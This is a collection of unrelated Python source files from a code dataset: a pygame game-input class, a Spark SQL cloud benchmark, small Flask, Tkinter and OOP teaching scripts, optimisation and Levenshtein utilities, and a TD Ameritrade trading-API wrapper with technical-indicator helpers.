user\n #parameters are: board containing current state of the game, whose turn is it (necessary only for BotPlayer)\n #return values are: whether or not player has clicked exit, row of sampled move, column of sampled move\n def sampleMove(self, board, turn):\n done = False\n exitClicked = False\n\n while not done:\n for event in pygame.event.get():\n\n\n if event.type == pygame.QUIT: #quit\n done = True\n exitClicked = True\n \n\n elif event.type == pygame.MOUSEBUTTONDOWN: #get mouse input\n position = pygame.mouse.get_pos()\n\n row, column = self.convertPosition(position) #convert pixel position into row and column\n if 0 == board[row][column]: #check if given tile is empty\n done = True\n\n\n pygame.display.flip()\n self.clock.tick(self.fps)\n\n return exitClicked, row, column\n\n\n\n\n\n ################################################################################################################\n # Auxiliary functions #\n ################################################################################################################\n\n\n #convert pixel position into row and column\n #parameters are: pair of integers indicating x and y of the click\n #return values are: row of sampled move, column of sampled move \n def convertPosition(self, position):\n column = int(position[0] // self.tileXSize) + 1\n row = int(position[1] // self.tileYSize) + 1\n return row, column\n\n\n\n #wait until a key press\n def waitForKeyPress(self):\n done = False\n\n while not done:\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT or event.type == pygame.MOUSEBUTTONDOWN or event.type == pygame.KEYDOWN:\n done = True\n\n pygame.display.flip()\n self.clock.tick(self.fps)\n","sub_path":"human_player.py","file_name":"human_player.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"530970753","text":"# Copyright 2019 PerfKitBenchmarker Authors. 
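A minimal driving sketch for filter_centers above; the payload shape is inferred from the function's own field lookups, and keys like available_capacity_dose1 are my guess at what a Dose enum value holds:

centers = {
    "centers": [{
        "fee_type": "Free",
        "sessions": [
            {"min_age_limit": 18, "vaccine": "COVISHIELD", "available_capacity_dose1": 5},
            {"min_age_limit": 45, "vaccine": "COVAXIN", "available_capacity_dose1": 0},
        ],
    }]
}

# Sessions failing a filter are dropped; a center left with no sessions vanishes too.
eighteen_plus = filter_centers(centers, min_age_limit=18)
assert len(eighteen_plus["centers"][0]["sessions"]) == 1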
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Executes query on Spark SQL and records the latency.\n\nThe Data (TPCDS or TPCH) needs be generated first by user.\nTPCDS and TPCH tools.\nTPCDS: https://github.com/databricks/tpcds-kit\nTPCH: https://github.com/databricks/tpch-dbgen\n\nThis benchmark uses queries from https://github.com/databricks/spark-sql-perf.\nBecause spark SQL doesn't support all the queries that using dialect netezza.\n\"\"\"\n\nimport logging\nimport os\nimport re\nfrom perfkitbenchmarker import configs\nfrom perfkitbenchmarker import data\nfrom perfkitbenchmarker import dpb_service\nfrom perfkitbenchmarker import errors\nfrom perfkitbenchmarker import flags\nfrom perfkitbenchmarker import object_storage_service\nfrom perfkitbenchmarker import sample\nfrom perfkitbenchmarker import temp_dir\nfrom perfkitbenchmarker import vm_util\nfrom perfkitbenchmarker.dpb_service import BaseDpbService\n\nBENCHMARK_NAME = 'dpb_sparksql_benchmark'\n\nBENCHMARK_CONFIG = \"\"\"\ndpb_sparksql_benchmark:\n description: Run Spark SQL on dataproc and emr\n dpb_service:\n service_type: dataproc\n worker_group:\n vm_spec:\n GCP:\n machine_type: n1-standard-1\n AWS:\n machine_type: m5.xlarge\n worker_count: 2\n\"\"\"\nflags.DEFINE_string('dpb_sparksql_data', None,\n 'The dataset to run Spark SQL query')\nflags.DEFINE_enum('dpb_sparksql_query', 'tpcds_2_4', ['tpcds_2_4', 'tpch'],\n 'A list of query to run on dpb_sparksql_data')\nflags.DEFINE_list('dpb_sparksql_order', [],\n 'The order of query templates in each query stream.')\n\nFLAGS = flags.FLAGS\n\nSUPPORTED_DPB_BACKENDS = [dpb_service.DATAPROC, dpb_service.EMR]\nJOB_CATEGORY = BaseDpbService.SPARK_JOB_TYPE\nJOB_TYPE = 'spark-sql'\n# Creates spark table using pyspark by loading the parquet data.\n# Args:\n# argv[1]: string, The table name in the dataset that this script will create.\n# argv[2]: string, The data path of the table.\nSPARK_TABLE_SCRIPT = 'spark_table.py'\nSPARK_SQL_PERF_GIT = 'https://github.com/databricks/spark-sql-perf.git'\nSPARK_SQL_PERF_GIT_COMMIT = '6b2bf9f9ad6f6c2f620062fda78cded203f619c8'\n\n\ndef GetConfig(user_config):\n return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)\n\n\ndef CheckPrerequisites(benchmark_config):\n \"\"\"Verifies that the required resources are present.\n\n Args:\n benchmark_config: Config needed to run the Spark SQL.\n\n Raises:\n perfkitbenchmarker.errors.Config.InvalidValue: On encountering invalid\n configuration.\n \"\"\"\n dpb_service_type = benchmark_config.dpb_service.service_type\n if dpb_service_type not in SUPPORTED_DPB_BACKENDS:\n raise errors.Config.InvalidValue(\n 'Invalid backend {} for Spark SQL. 
Not in: {}'.format(\n dpb_service_type, SUPPORTED_DPB_BACKENDS))\n\n\ndef Prepare(benchmark_spec):\n \"\"\"Installs and sets up dataset on the Spark clusters.\n\n Copies SPARK_TABLE_SCRIPT and all the queries to cloud.\n Creates sparktable using SPARK_TABLE_SCRIPT.\n\n Args:\n benchmark_spec: The benchmark specification\n \"\"\"\n dpb_service_instance = benchmark_spec.dpb_service\n run_uri = benchmark_spec.uuid.split('-')[0]\n dpb_service_instance.CreateBucket(run_uri)\n\n temp_run_dir = temp_dir.GetRunDirPath()\n spark_sql_perf_dir = os.path.join(temp_run_dir, 'spark_sql_perf_dir')\n vm_util.IssueCommand(['git', 'clone', SPARK_SQL_PERF_GIT, spark_sql_perf_dir])\n vm_util.IssueCommand(['git', 'checkout', SPARK_SQL_PERF_GIT_COMMIT],\n cwd=spark_sql_perf_dir)\n query_dir = os.path.join(spark_sql_perf_dir, 'src', 'main', 'resources',\n FLAGS.dpb_sparksql_query)\n\n storage_service = object_storage_service.GetObjectStorageClass(FLAGS.cloud)()\n dst_url = '{prefix}{uri}'.format(\n prefix=dpb_service_instance.PERSISTENT_FS_PREFIX, uri=run_uri)\n for dir_name, _, files in os.walk(query_dir):\n for filename in files:\n match = re.match(r'q?([0-9]+)a?.sql', filename)\n if match:\n query_id = match.group(1)\n query = '{}.sql'.format(query_id)\n src_url = os.path.join(dir_name, filename)\n storage_service.Copy(src_url, os.path.join(dst_url, query))\n\n src_url = data.ResourcePath(SPARK_TABLE_SCRIPT)\n storage_service.Copy(src_url, dst_url)\n benchmark_spec.base_dir = dst_url\n\n stdout = storage_service.List(FLAGS.dpb_sparksql_data)\n\n for table_dir in stdout.split('\\n'):\n # The directory name is the table name.\n if not table_dir:\n continue\n table = re.split(' |/', table_dir.rstrip('/')).pop()\n stats = dpb_service_instance.SubmitJob(\n pyspark_file=os.path.join(dst_url, SPARK_TABLE_SCRIPT),\n job_type=BaseDpbService.PYSPARK_JOB_TYPE,\n job_arguments=[FLAGS.dpb_sparksql_data, table])\n logging.info(stats)\n if not stats['success']:\n logging.warning('Creates table %s from %s failed', table, table_dir)\n\n\ndef Run(benchmark_spec):\n \"\"\"Runs Spark SQL.\n\n Args:\n benchmark_spec: Spec needed to run the Spark SQL.\n\n Returns:\n A list of samples, comprised of the detailed run times of individual query.\n \"\"\"\n dpb_service_instance = benchmark_spec.dpb_service\n metadata = benchmark_spec.dpb_service.GetMetadata()\n\n results = []\n total_wall_time = 0\n total_run_time = 0\n unit = 'seconds'\n for query_number in FLAGS.dpb_sparksql_order:\n query = '{}.sql'.format(query_number)\n stats = dpb_service_instance.SubmitJob(\n None,\n None,\n query_file=os.path.join(benchmark_spec.base_dir, query),\n job_type=BaseDpbService.SPARKSQL_JOB_TYPE)\n logging.info(stats)\n metadata_copy = metadata.copy()\n metadata_copy['query'] = query\n if stats[dpb_service.SUCCESS]:\n run_time = stats[dpb_service.RUNTIME]\n wall_time = run_time + stats[dpb_service.WAITING]\n results.append(\n sample.Sample('sparksql_wall_time', wall_time, unit, metadata_copy))\n results.append(\n sample.Sample('sparksql_run_time', run_time, unit, metadata_copy))\n total_wall_time += wall_time\n total_run_time += run_time\n results.append(sample.Sample(\n 'sparksql_total_wall_time', total_wall_time, unit, metadata))\n results.append(sample.Sample(\n 'sparksql_total_run_time', total_run_time, unit, metadata))\n return results\n\n\ndef Cleanup(_):\n \"\"\"Cleans up the Spark SQL.\"\"\"\n 
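For reference, the filename filter that Prepare() above applies when copying query files behaves like this (standalone sketch):

import re

for name in ["q14a.sql", "7.sql", "README.md"]:
    m = re.match(r'q?([0-9]+)a?.sql', name)
    print(name, '->', m.group(1) if m else None)
# q14a.sql -> 14, 7.sql -> 7, README.md -> None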
pass\n","sub_path":"perfkitbenchmarker/linux_benchmarks/dpb_sparksql_benchmark.py","file_name":"dpb_sparksql_benchmark.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"588186031","text":"#Team Random: Ethan Machleder, Mary Shang, Jessica Yeung\n#SoftDev\n#K10: Putting Little Pieces Together\n#2020-10-10\n\nfrom flask import Flask\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello_world():\n    print(__name__) #prints __main__ in the terminal\n    return \"No hablo queso!\" #prints \"No hablo queso!\" on the webpage in plain text\n\napp.run() \n","sub_path":"10_flask01/v0/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"572326878","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Person object\"\"\"\n\n__author__ = \"Jacson F. Heiderscheidt\"\n__copyright__ = \"Copyright 2021, Allpy Project\"\n__credits__ = [\"JFH\"]\n__license__ = \"GPL\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"JFH\"\n__email__ = \"jacsonfh@gmail.com\"\n__status__ = \"Estudo de POO\"\n\nfrom datetime import datetime\n\nclass Pessoa:\n    ano_atual = int(datetime.strftime(datetime.now(), '%Y')) # Class attribute.\n\n    def __init__(self, nome, idade, comendo = False, falando = False): # Instance attributes.\n        self.nome = nome\n        self.idade = idade\n        self.comendo = comendo\n        self.falando = falando\n\n    def falar(self, assunto):\n        if self.comendo:\n            print(f'{self.nome} não pode falar comendo.')\n            return\n\n        if self.falando:\n            print(f'{self.nome} já está falando.')\n            return\n\n        print(f'{self.nome} está falando sobre {assunto}.')\n        self.falando = True\n\n    def parar_falar(self):\n        if not self.falando:\n            print(f'{self.nome} não está falando.')\n            return\n\n        print(f'{self.nome} parou de falar.')\n        self.falando = False\n\n    def comer(self, alimento):\n        if self.comendo:\n            print(f'{self.nome} já está comendo.')\n            return\n\n        if self.falando:\n            print(f'{self.nome} não pode comer falando.')\n            return\n\n        print(f'{self.nome} está comendo {alimento}.')\n        self.comendo = True\n    \n    def parar_comer(self):\n        if not self.comendo:\n            print(f'{self.nome} não está comendo.')\n            return\n        \n        print(f'{self.nome} parou de comer.')\n        self.comendo = False\n        return\n\n    def get_ano_nascimento(self):\n        return self.ano_atual - self.idade\n\n","sub_path":"poo/pessoa.py","file_name":"pessoa.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"405716984","text":"'''\nCreated on Oct 28, 2012\n\n@author: Andrii\n'''\nfrom tkinter import *\nroot = Tk()\nwidget = Label(root)\nwidget.config(text = 'Hey GUI!')\nwidget.pack(side=TOP, expand=YES, fill=BOTH)\nroot.title('gui1g.py')\nroot.mainloop()","sub_path":"gui1g.py","file_name":"gui1g.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"303945678","text":"import numpy as np\n\ndef randQuad(n):\n    A = np.random.randn(n,n) #random matrix A\n    B = A.T\n    Q = np.matmul(B,A) # symmetric positive semidefinite matrix (definite with probability 1)\n    b = np.random.randn(n,1) #random vector b\n    return [Q,b]\n\ndef myQuad(x, Q, b):\n    r = 0.5 * ((x.T) @ Q @ x) - ((b.T) @ x) # value of the quadratic at x\n    g = (Q @ x) - b # gradient vector at x, consistent with the 1/2 x'Qx - b'x convention\n    return [r,g]\n\ndef myPerm(x):\n    n = x.size\n    r = 0\n    g = np.zeros(n)\n    for i in range(1, n+1):\n        inner = 0\n        for j in range(1, n+1):\n            inner += (j + 10) * (pow(x[j-1], i) - (1/pow(j, i))) # i-th inner sum of the Perm function\n        r += pow(inner, 2)\n        for k in range(1, n+1):\n            # chain rule: d(inner)/dx_k = (k+10) * i * x_k^(i-1)\n            g[k-1] += 2 * inner * (k + 10) * i * pow(x[k-1], i-1)\n    return [r, g]","sub_path":"mcs435_(nonlinear_optimization)/Assignment_1/venv/Assignment1.py","file_name":"Assignment1.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"529867012","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 27 11:22:18 2019\n\n@author: Sam\n\nSolving the HiTech problem in PuLP\n\n\"\"\"\n#import sys \n#sys.modules[__name__].__dict__.clear()\n\n#%%\nimport pulp\nfrom pulp import *\npulp.pulpTestAll() # run PuLP's self-test (needs the pulp name, hence the extra import)\n\n#%%\nprob = LpProblem(\"HiTech\",LpMaximize) # create an LP maximization problem\nx_A = LpVariable(\"x_A\",lowBound=0) # create a variable x_A>=0\nx_B = LpVariable(\"x_B\",lowBound=0) # create a variable x_B>=0\nprob += 20*x_A + 30*x_B # objective function\nprob += x_A >= 25 # contractual commitment\nprob += 4*x_A + 3*x_B <= 240 # assembly hours\nprob += 1*x_A + 2*x_B <= 140 # testing hours\nprint(prob) # display the LP problem\n#%%\nstatus = prob.solve() # solve with default solver\nprint(LpStatus[status]) # print the solution status\n#%%\nfor v in prob.variables():\n    print(v.name, \"=\", v.varValue)\nprint(\"Total Profit = \", value(prob.objective))\n","sub_path":"LP_HiTech.py","file_name":"LP_HiTech.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"259127129","text":"# -*- coding: utf-8 -*-\n\n\ndef levenshtein(a, b):\n    \"\"\" Calculates the Levenshtein distance between a and b.\n    from http://hetland.org/coding/python/levenshtein.py\n\n    For other implementations, see\n    http://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance\n    \"\"\"\n    n, m = len(a), len(b)\n    if n > m:\n        a, b = b, a\n        n, m = m, n\n    current = range(n + 1)\n    for i in range(1, m + 1):\n        previous, current = current, [i] + [0] * n\n        for j in range(1, n + 1):\n            add, delete = previous[j] + 1, current[j - 1] + 1\n            change = previous[j - 1]\n            if a[j - 1] != b[i - 1]:\n                change = change + 1\n            current[j] = min(add, delete, change)\n    return current[n]\n","sub_path":"fin_sanctions/lev.py","file_name":"lev.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"652315188","text":"# Last update 6-9 to update our refresh key\n\nimport os\nimport time\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom plotly.subplots import make_subplots\nfrom plotly.colors import n_colors\nfrom textwrap import dedent as d\n\nimport pandas as pd #Pandas-- data framework\nimport numpy as np #Numpy-- logic framework\n# import scipy #SciPy-- scientific function/ math framework\nimport datetime #for writing out unique files\nimport sys #Supports pick up of files from directories\nimport math\nimport time\nimport json\nimport ciso8601\nimport requests\n\nimport 
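The analytic Perm-function gradient in the Assignment1.py record above can be validated cheaply with central differences; a sketch, assuming myPerm is in scope and numpy is available:

import numpy as np

def grad_check(f, x, h=1e-6):
    # Central finite differences, one coordinate at a time; f returns [value, grad].
    g = np.zeros_like(x, dtype=float)
    for k in range(x.size):
        e = np.zeros_like(x, dtype=float)
        e[k] = h
        g[k] = (f(x + e)[0] - f(x - e)[0]) / (2 * h)
    return g

x0 = np.array([0.5, 0.25])
assert np.allclose(grad_check(myPerm, x0), myPerm(x0)[1], rtol=1e-4)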
warnings\nwarnings.filterwarnings('ignore')\npd.set_option('display.max_columns', 500)\n\nimport urllib\nclass TDAmeritrade:\n\n def __init__(self, refresh_token=None, consumer_key=None, access_token=None):\n if refresh_token != None:\n self.refresh_token = refresh_token\n else:\n self.refresh_token = pd.read_csv('refresh_key.csv').at[0,'refresh_token'] # Grab the latest - will be switched to memsql query later\n\n if consumer_key != None:\n self.consumer_key = consumer_key\n else:\n self.consumer_key = '#########' # Hardcoded for October2020\n\n self.access_token_timer = round(time.time()) + 1800\n if access_token != None:\n self.access_token = access_token\n else:\n self.access_token = self.get_refresh_key()['access_token']\n\n\n def get_refresh_key(self, new_refresh=False):\n# https://developer.tdameritrade.com/authentication/apis/post/token-0\n self.check_token_time()\n\n refresh_token=self.refresh_token\n consumer_key=self.consumer_key\n\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n\n if new_refresh == True:\n body = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token,\n \"access_type\": 'offline',\n \"client_id\": '{}@AMER.OAUTHAP'.format(consumer_key), #(yes, add \"@AMER.OAUTHAP\" without quotes)\n }\n else:\n body = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token,\n \"client_id\": '{}@AMER.OAUTHAP'.format(consumer_key), #(yes, add \"@AMER.OAUTHAP\" without quotes)\n }\n\n r = requests.post('https://api.tdameritrade.com/v1/oauth2/token', data=body, headers=headers)\n\n r2 = r.json()\n\n r2['create_ts'] = round(time.time())\n\n return r2\n\n def check_token_time(self):\n if self.access_token_timer <= time.time():\n self.update_access_token()\n return\n\n def update_access_token(self):\n self.access_token_timer = round(time.time()) + 1800\n self.access_token = self.get_refresh_key()['access_token']\n\n\n def save_refresh_key(self):\n d_ = self.get_refresh_key(new_refresh=True)\n pd.DataFrame.from_dict(d_, orient='index').to_csv('refresh_key.csv')\n\n\n def get_option_chain(self, body):\n# https://developer.tdameritrade.com/option-chains/apis/get/marketdata/chains#\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n body['apikey'] = self.consumer_key\n\n request_str = 'https://api.tdameritrade.com/v1/marketdata/chains?apikey={apikey}'.format(apikey=self.consumer_key)\n\n for k in body.keys():\n v = body[k]\n if v != '':\n add_s = '&{k}={v}'.format(k=k,v=v)\n request_str += add_s\n\n r = requests.get(request_str, headers=headers)\n\n r2 = r.json()\n\n return r2\n\n def get_price_history(self, symbol, body):\n# https://developer.tdameritrade.com/price-history/apis/get/marketdata/%7Bsymbol%7D/pricehistory\n self.check_token_time()\n\n # Need to add alot of settings to this one - check the url\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n request_str = 'https://api.tdameritrade.com/v1/marketdata/{symbol}/pricehistory?apikey={apikey}'.format(apikey=self.consumer_key, symbol=symbol)\n\n for k in body.keys():\n v = body[k]\n if v != '':\n add_s = '&{k}={v}'.format(k=k,v=v)\n request_str += add_s\n\n r = requests.get(request_str, headers=headers)\n\n r2 = r.json()\n\n return r2\n\n\n def get_quotes(self, symbol):\n\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n if len(symbol) == 1:\n symbol = 
symbol[0]\n r = requests.get('https://api.tdameritrade.com/v1/marketdata/{symbol}/quotes?apikey={apikey}'.format(apikey=self.consumer_key, symbol=symbol))\n else:\n s = ''\n for sym in symbol:\n s = s + sym + ','\n\n s = s[:-1]\n symbols = urllib.parse.quote(s)\n\n r = requests.get('https://api.tdameritrade.com/v1/marketdata/quotes?apikey={apikey}&symbol={symbol}'.format(apikey=self.consumer_key, symbol=symbols))\n r2 = r.json()\n\n return r2\n\n\n ### Lets define some custom sell functions ###\n def limit_trailing_sell(self, symbol, min_price, trail_amt, perc=False):\n\n ## Get quote data from symbol\n\n# max_price = max(prices)\n\n# if max_price >= min_price: # Enter the sell logic\n\n# # Compare if we have trailed enough to sell\n\n# if perc!=False: # It's a percent trail\n# trail_amt = max_price*(trail_amt/100)\n\n# sell_price = max_price - trail_amt\n\n# if current_price <= sell_price:\n\n# self.execute_trade(symbol, price, etc...)\n\n\n\n\n return\n\n def days_to_exp(self, exp_date, curr_date):\n\n if (type(exp_date) == int) or (type(exp_date) == float):\n\n diff = (exp_date/1000) - (curr_date/1000)\n\n else:\n\n exp_date = str(exp_date)[0:10] + ' 15:00:00'\n diff = time.mktime(datetime.datetime.strptime(exp_date, \"%Y-%m-%d %H:%M:%S\").timetuple()) - (curr_date/1000)\n\n r = (diff/60/60/24)\n\n return r\n\n\n def get_option_chain_df(self, body):\n\n oc = self.get_option_chain(body)\n\n call_data = oc['callExpDateMap']\n put_data = oc['putExpDateMap']\n und_price = oc['underlyingPrice']\n\n call_df = pd.io.json.json_normalize(call_data).melt()\n put_df = pd.io.json.json_normalize(put_data).melt()\n\n call_df['value'] = call_df['value'].apply(lambda x: x[0])\n put_df['value'] = put_df['value'].apply(lambda x: x[0])\n\n\n call_df2 = pd.io.json.json_normalize(call_df['value'])\n put_df2 = pd.io.json.json_normalize(put_df['value'])\n\n rdf = pd.concat([call_df2, put_df2], ignore_index=True)\n rdf['underlyingPrice'] = und_price\n rdf['und_symbol'] = body['symbol']\n\n\n rdf['expirationDateStr'] = pd.to_datetime(rdf['expirationDate'],unit='ms')\n rdf['expirationDateStr'] = rdf['expirationDateStr'].apply(lambda x: str(x)[0:10])\n\n rdf['dte_calc'] = rdf.apply(lambda row: self.days_to_exp(row['expirationDate'], row['quoteTimeInLong']),axis=1)\n\n\n return rdf\n\n\n def calc_profit(self, sell_price, buy_price, strike, volume, type_):\n\n if type_ == 'PUT':\n profit = max(((strike - (sell_price-buy_price))*volume), -1*buy_price*volume)\n else:\n profit = max((((sell_price-buy_price)-strike)*volume), -1*buy_price*volume)\n\n return profit\n\n\n def bulk_calc_profit_df(self, df_, sell_price, volume):\n\n df_['profit'] = df_.apply(lambda row: self.calc_profit(sell_price, row['ask'], row['strikePrice'], volume, row['putCall']),axis=1)\n df_['sell_price'] = sell_price\n\n return df_\n\n def generate_option_symbols(self, underlying, strikes, dates, types='both'):\n\n if types=='both':\n typelist = ['C', 'P']\n elif types=='PUT':\n typelist = ['P']\n elif types=='CALL':\n typelist = ['C']\n\n symbol_list = []\n for k in strikes:\n for d in dates:\n for t in typelist:\n s = '{und}_{date}{t}{strike}'.format(und=underlying, date=d,t=t,strike=k)\n symbol_list.append(s)\n\n return symbol_list\n\n def execute_trade_equity(self, order_type, price, qty, buysell, symbol, duration='DAY'):\n\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n trade_request = {\n 'orderType':order_type,\n \"session\": 'NORMAL',\n \"duration\": 
duration,\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n \"instruction\": buysell,\n 'quantity': qty,\n 'instrument': {\n 'symbol': symbol,\n 'assetType': 'EQUITY'}\n }]\n }\n\n if order_type == 'LIMIT':\n trade_request['price'] = price\n\n r = requests.post('https://api.tdameritrade.com/v1/accounts/#########/orders', data=json.dumps(trade_request), headers=headers)\n\n return r\n\n def execute_trade_option(self, order_type, price, qty, buysell, symbol, exp_date, putCall, strike, duration='DAY'):\n\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n sym_date = exp_date[5:7]+exp_date[8:]+exp_date[2:4]\n option_symbol = self.generate_option_symbols(symbol, [strike], [sym_date], types=putCall)[0]\n\n\n trade_request = {\n 'orderType':order_type,\n \"session\": 'NORMAL',\n \"duration\": duration,\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n \"instruction\": buysell,\n 'quantity': qty,\n 'instrument': {\n 'symbol': option_symbol,\n 'assetType': 'OPTION',\n \"putCall\": putCall\n }\n }]\n }\n\n if order_type == 'LIMIT':\n trade_request['price'] = price\n\n r = requests.post('https://api.tdameritrade.com/v1/accounts/#########/orders', data=json.dumps(trade_request), headers=headers)\n\n return r\n\n def get_option_chain_flowalgo_db(self, symbol, putCall, strike, exp_date):\n\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n body = {}\n body['apikey'] = self.consumer_key\n body['symbol'] = symbol\n body['contractType'] = putCall\n body['strike'] = strike\n body['fromDate'] = exp_date\n body['toDate'] = exp_date\n\n request_str = 'https://api.tdameritrade.com/v1/marketdata/chains?apikey={apikey}'.format(apikey=self.consumer_key)\n\n for k in body.keys():\n v = body[k]\n if v != '':\n add_s = '&{k}={v}'.format(k=k,v=v)\n request_str += add_s\n\n r = requests.get(request_str, headers=headers)\n\n r2 = r.json()\n\n return r2\n\n def get_option_chain_flowalgo_db_df(self, symbol, putCall, strike, exp_date):\n\n oc = self.get_option_chain_flowalgo_db(symbol, putCall, strike, exp_date)\n\n call_data = oc['callExpDateMap']\n put_data = oc['putExpDateMap']\n und_price = oc['underlyingPrice']\n\n call_df = pd.io.json.json_normalize(call_data).melt()\n put_df = pd.io.json.json_normalize(put_data).melt()\n\n call_df['value'] = call_df['value'].apply(lambda x: x[0])\n put_df['value'] = put_df['value'].apply(lambda x: x[0])\n\n\n call_df2 = pd.io.json.json_normalize(call_df['value'])\n put_df2 = pd.io.json.json_normalize(put_df['value'])\n\n rdf = pd.concat([call_df2, put_df2], ignore_index=True)\n rdf['underlyingPrice'] = und_price\n rdf = rdf.drop('value',axis=1)\n\n return rdf\n\n def get_account_positions(self):\n# https://developer.tdameritrade.com/account-access/apis/get/accounts/%7BaccountId%7D-0\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n acct_url = 'https://api.tdameritrade.com/v1/accounts/#########?fields=positions%2Corders'\n\n r = requests.get(acct_url, headers=headers)\n\n r2 = r.json()\n\n return r2\n\n def get_symbols(self, sym):\n# https://developer.tdameritrade.com/instruments/apis/get/instruments\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n acct_url = 
'https://api.tdameritrade.com/v1/instruments?symbol={}&projection=symbol-regex'.format(sym)\n\n r = requests.get(acct_url, headers=headers)\n\n r2 = r.json()\n\n return r2\n\ndef stringify_eid(eids):\n s = ''\n for id_ in eids:\n s += \"'{}',\".format(id_)\n return s[:-1]\n\ndef random_color():\n rgbl=[random.randint(0,255),random.randint(0,255),random.randint(0,255)]\n random.shuffle(rgbl)\n return tuple(rgbl)\n\n\n### GRAPHING AND CALCULATING FUNCTIONS ###\n\ndef rolling_consecutives(s):\n\n cons = 0\n outlist = []\n for i in range(len(s)):\n\n if s[i] == 1:\n cons += 1\n else:\n cons = 0\n\n outlist.append(cons)\n\n return outlist\n\ndef rsi_calc(rs):\n\n try:\n r = 100 - (100 / (1+rs))\n except ZeroDivisionError:\n r = np.nan\n\n return r\n\ndef calc_avgUD(col, n=14):\n\n rlist = [np.nan]*n\n for i in range(n, len(col)):\n\n avg = col[i-n:i].mean()\n rlist.append(avg)\n\n return rlist\n\ndef wilders_smoothing(alpha, val, old_ws):\n\n avgt = (alpha * val) + ((1-alpha) * old_ws)\n\n return avgt\n\ndef calc_avgUD_ws(col, n=14):\n\n rlist = [0]*n\n for i in range(n, len(col)):\n\n avg = wilders_smoothing(1/n, col[i], rlist[i-1])\n rlist.append(avg)\n\n return rlist\n\ndef get_historical_stock_data(tda_function, symbol, startDate, endDate, frequencyType='minute', frequency=1, ext_hours='true', rsi_method='wilders'):\n\n if type(startDate)==str:\n startDate = int(time.mktime(ciso8601.parse_datetime(startDate).timetuple())*1000)\n if type(endDate)==str:\n endDate = int(time.mktime(ciso8601.parse_datetime(endDate).timetuple())*1000)\n if ext_hours==True:\n ext_hours='true'\n\n payload = {'startDate':startDate, 'endDate':endDate, 'frequency':frequency, 'frequencyType':frequencyType, 'needExtendedHoursData':ext_hours}\n if frequencyType not in ['minute', 'hour']: # the TD price-history documentation is unclear here: https://developer.tdameritrade.com/content/price-history-samples\n payload['periodType']='month'\n\n ## 45-minute and 4-hour aggregations are not supported by the API, so build them ourselves\n if (frequencyType=='minute') and (frequency==45):\n\n payload['frequency'] = 15\n\n rdf_pull = tda_function.get_price_history(symbol, payload)\n rdf = pd.DataFrame(rdf_pull['candles'])\n\n rdf['time_group'] = [round((x+2)/3)*3 for x in rdf.index.values]\n rdf = rdf.groupby('time_group',as_index=False).agg({'open': 'first', 'high':'max', 'low':'min', 'close':'last', 'volume':'sum', 'datetime':'first'}).drop('time_group',axis=1)\n\n elif (frequencyType=='hour'):\n payload['frequency'] = 30\n payload['frequencyType'] = 'minute'\n\n rdf_pull = tda_function.get_price_history(symbol, payload)\n rdf = pd.DataFrame(rdf_pull['candles'])\n\n h=frequency\n h=h*2\n\n rdf['time_group'] = [round((x)//(h))*(h) for x in rdf.index.values]\n rdf = rdf.groupby('time_group',as_index=False).agg({'open': 'first', 'high':'max', 'low':'min', 'close':'last', 'volume':'sum', 'datetime':'first'}).drop('time_group',axis=1)\n\n else:\n\n rdf_pull = tda_function.get_price_history(symbol, payload)\n rdf = pd.DataFrame(rdf_pull['candles'])\n\n 